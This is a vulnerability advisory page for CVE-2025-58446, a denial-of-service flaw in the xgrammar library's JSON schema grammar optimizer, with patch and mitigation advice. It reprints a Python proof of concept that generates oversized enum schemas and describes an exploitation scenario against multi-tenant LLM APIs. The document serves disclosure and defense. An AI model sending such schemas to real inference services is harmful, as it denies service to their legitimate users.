CVE-2025-58446: xgrammar: DoS via oversized JSON schema grammar parsing
GHSA-9q5r-wfvf-rr7f MEDIUM PoC AVAILABLE CISA: TRACK*xgrammar v0.1.23 has a DoS vulnerability where crafted large JSON schemas (>100k chars) trigger a pathologically slow grammar optimizer, blocking model inference for minutes per request. Any model serving endpoint that accepts user-defined JSON schemas for constrained/structured output is directly exploitable with a trivial PoC. Patch to v0.1.24 immediately; if delayed, enforce schema byte-size limits at the API gateway before requests reach the inference layer.
What is the risk?
Effective risk is medium-high for exposed inference endpoints, despite the medium CVSS. The attack surface is any API that accepts caller-supplied JSON schemas for structured generation — a common pattern in agentic and enterprise LLM deployments. EPSS is very low (0.00091), suggesting no current active exploitation, but the PoC is fully public and requires zero AI/ML expertise to execute. Impact is availability, not confidentiality — a single malicious request can monopolize an inference thread for minutes, enabling throughput starvation against multi-tenant or high-availability deployments.
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| XGrammar | pip | = 0.1.23 | 0.1.24 |
Do you use XGrammar? You're affected.
How severe is it?
What should I do?
5 steps-
Patch
Upgrade xgrammar to v0.1.24 or later — the fix optimizes the grammar optimizer and disables slow paths for large grammars.
-
Short-term workaround
Enforce a maximum schema size limit (e.g., 50KB) at the API gateway or application layer before calling Grammar.from_json_schema().
-
Rate limiting
Apply per-client rate limiting on constrained generation endpoints, independent of token-based limits.
-
Detection
Alert on grammar parsing durations exceeding 10 seconds — this is anomalous and indicative of exploitation.
-
Audit exposure
Identify all internal services or APIs that accept caller-supplied JSON schemas and pass them directly to xgrammar without validation.
What does CISA's SSVC say?
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
How is it classified?
Which compliance frameworks are affected?
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2025-58446?
xgrammar v0.1.23 has a DoS vulnerability where crafted large JSON schemas (>100k chars) trigger a pathologically slow grammar optimizer, blocking model inference for minutes per request. Any model serving endpoint that accepts user-defined JSON schemas for constrained/structured output is directly exploitable with a trivial PoC. Patch to v0.1.24 immediately; if delayed, enforce schema byte-size limits at the API gateway before requests reach the inference layer.
Is CVE-2025-58446 actively exploited?
Proof-of-concept exploit code is publicly available for CVE-2025-58446, increasing the risk of exploitation.
How to fix CVE-2025-58446?
1. **Patch**: Upgrade xgrammar to v0.1.24 or later — the fix optimizes the grammar optimizer and disables slow paths for large grammars. 2. **Short-term workaround**: Enforce a maximum schema size limit (e.g., 50KB) at the API gateway or application layer before calling Grammar.from_json_schema(). 3. **Rate limiting**: Apply per-client rate limiting on constrained generation endpoints, independent of token-based limits. 4. **Detection**: Alert on grammar parsing durations exceeding 10 seconds — this is anomalous and indicative of exploitation. 5. **Audit exposure**: Identify all internal services or APIs that accept caller-supplied JSON schemas and pass them directly to xgrammar without validation.
What systems are affected by CVE-2025-58446?
This vulnerability affects the following AI/ML architecture patterns: model serving, structured output pipelines, LLM inference APIs, agentic tool-calling pipelines.
What is the CVSS score for CVE-2025-58446?
No CVSS score has been assigned yet.
What is the AI security impact?
Affected AI Architectures
MITRE ATLAS Techniques
AML.T0029 Denial of AI Service AML.T0034 Cost Harvesting AML.T0049 Exploit Public-Facing Application Compliance Controls Affected
What are the technical details?
Original Advisory
### Summary Provided grammar, would fit in a context window of most of the models, but takes minutes to process in 0.1.23. In testing with 0.1.16 the parser worked fine so this seems to be a regression caused by Earley parser. ### Details Full reproducer provider in the POC section. The resulting grammar is around 70k tokens, and the grammar parsing itself (with the models I checked) was significantly longer than LLM processing itself, meaning this can be used to DOS model providers. ### Patch This problem is caused by the grammar optimizer introduced in v0.1.23 being too slow. It only happens for very large grammars (>100k characters), like the below one. v0.1.24 solved this problem by optimizing the speed of the grammar optimizer and disable some slow optimization for large grammars. Thanks to @Seven-Streams ### PoC ``` import string import random def enum_schema(size=10000,str_len=10): enum = {"enum": ["".join(random.choices(string.ascii_uppercase, k=str_len)) for _ in range(size)]} schema = { "definitions": { "colorEnum": enum }, "type": "object", "properties": { "color1": { "$ref": "#/definitions/colorEnum" }, "color2": { "$ref": "#/definitions/colorEnum" }, "color3": { "$ref": "#/definitions/colorEnum" }, "color4": { "$ref": "#/definitions/colorEnum" }, "color5": { "$ref": "#/definitions/colorEnum" }, "color6": { "$ref": "#/definitions/colorEnum" }, "color7": { "$ref": "#/definitions/colorEnum" }, "color8": { "$ref": "#/definitions/colorEnum" } }, "required": [ "color1", "color2" ] } return schema schema_enum = enum_schema() print(schema_enum) print(test_schema(schema_enum, {})) ``` where: ``` def test_schema(schema, instance): grammar = xgr.Grammar.from_json_schema( json.dumps(schema), strict_mode=True ) return _is_grammar_accept_string(grammar, json.dumps(instance)) ``` ### Impact DOS
Exploitation Scenario
An adversary targeting a multi-tenant LLM API (e.g., an enterprise copilot or structured data extraction service) crafts a JSON schema with thousands of enum values totaling over 100k characters — trivially generated with the public PoC. They submit this as the response_format schema in a constrained generation request. The xgrammar optimizer enters a slow computation path, blocking the inference thread for several minutes. By issuing a small number of concurrent requests (5–10), the attacker can saturate all inference workers, causing complete service unavailability for legitimate users. The attack costs pennies in compute and requires no authentication bypass or specialized knowledge, only awareness of the library version and the public PoC.
Weaknesses (CWE)
CWE-770 — Allocation of Resources Without Limits or Throttling: The product allocates a reusable resource or group of resources on behalf of an actor without imposing any intended restrictions on the size or number of resources that can be allocated.
- [Requirements] Clearly specify the minimum and maximum expectations for capabilities, and dictate which behaviors are acceptable when resource allocation reaches limits.
- [Architecture and Design] Limit the amount of resources that are accessible to unprivileged users. Set per-user limits for resources. Allow the system administrator to define these limits. Be careful to avoid CWE-410.
Source: MITRE CWE corpus.
References
- github.com/advisories/GHSA-9q5r-wfvf-rr7f
- github.com/mlc-ai/xgrammar/commit/ced69c3ad2f8f61b516cc278a342e7c644383e27
- github.com/mlc-ai/xgrammar/security/advisories/GHSA-9q5r-wfvf-rr7f
- nvd.nist.gov/vuln/detail/CVE-2025-58446
- github.com/ARPSyndicate/cve-scores Exploit
- github.com/fkie-cad/nvd-json-data-feeds Exploit
Timeline
Related Vulnerabilities
CVE-2025-57809 7.5 xgrammar: uncontrolled recursion in grammar parsing causes DoS
Same package: xgrammar CVE-2025-32381 6.5 xgrammar: unbounded grammar cache causes LLM server DoS
Same package: xgrammar CVE-2026-25048 xgrammar: security flaw enables exploitation
Same package: xgrammar CVE-2026-33660 10.0 TensorFlow: type confusion NPD in tensor conversion
Same attack type: DoS CVE-2023-25668 9.8 TensorFlow: unauthenticated RCE via heap buffer overflow
Same attack type: DoS